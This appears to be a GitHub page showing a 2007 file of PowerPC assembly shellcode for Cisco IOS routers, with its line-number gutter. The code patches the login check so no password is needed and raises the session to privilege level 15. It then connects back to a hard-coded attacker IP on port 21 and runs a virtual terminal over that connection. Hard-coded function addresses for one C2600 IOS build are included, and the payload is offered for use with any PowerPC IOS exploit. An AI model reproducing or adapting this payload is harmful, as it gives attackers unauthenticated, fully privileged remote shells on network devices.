-
Notifications
You must be signed in to change notification settings - Fork 1
/
shellcode-144.c
executable file
·138 lines (126 loc) · 3.39 KB
/
shellcode-144.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
# ----------------------------------------------------------------------------------------
#
# Cisco IOS Connectback shellcode v1.0
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new TTY, allocates a shell with privilege level 15 and connects back
# on port 21
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following five hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ malloc, 0x804785CC
.equ allocate_tty, 0x803d155c
.equ ret, 0x804a42e8
.equ addr, 0x803c4ad8
.equ str, 0x81e270b4
.equ tcp_connect, 0x80567568
.equ tcp_execute_command, 0x8056c354
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# ----------------------------------------------------------------------------------------
main:
stwu 1,-48(1)
mflr 0
stw 31,44(1)
stw 0,52(1)
mr 31,1
li 3,512
lis 9,malloc@ha #malloc() memory for tcp structure
la 9,malloc@l(9)
mtctr 9
bctrl
mr 0,3
stw 0,20(31)
lwz 9,12(31)
li 0,1
stb 0,0(9)
lwz 9,12(31)
lis 0,0xac1e # connect back ip address
ori 0,0,1018 #
stw 0,4(9)
li 3,66
li 4,0
lis 9,allocate_tty@ha # allocate new TTY
la 9,allocate_tty@l(9)
mtctr 9
bctrl
addi 0,31,24
# Fix TTY structure to enable level 15 shell without password
#
#
##########################################################
# login patch begin
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end
#IDA placeholder for con0
#
# lis %r9, ((stdio+0x10000)@h)
# lwz %r9, stdio@l(%r9)
# lwz %r0, 0xDE4(%r9) #priv struct
#
# priv patch begin
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end
###########################################################
li 3,0
li 4,21 # Port 21 for connectback
lwz 5,12(31)
li 6,0
li 7,0
mr 8,0
li 9,0
lis 11,tcp_connect@ha # Connect to attacker IP
la 11,tcp_connect@l(11)
mtctr 11
bctrl
mr 0,3
stw 0,20(31)
li 3,66
lwz 4,20(31)
li 5,0
li 6,0
li 7,0
li 8,0
li 9,0
li 10,0
lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash
la 11,tcp_execute_command@l(11)
mtctr 11
bctrl
lwz 11,0(1)
lwz 0,4(11)
mtlr 0
lwz 31,-4(11)
mr 1,11
###########################################
lis 9, addr@ha
addi 0, 9, addr@l
mtctr 0
xor 3,3,3
addi 3,0, -2
lis 10, str@ha
addi 4, 10, str@l
bctrl
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl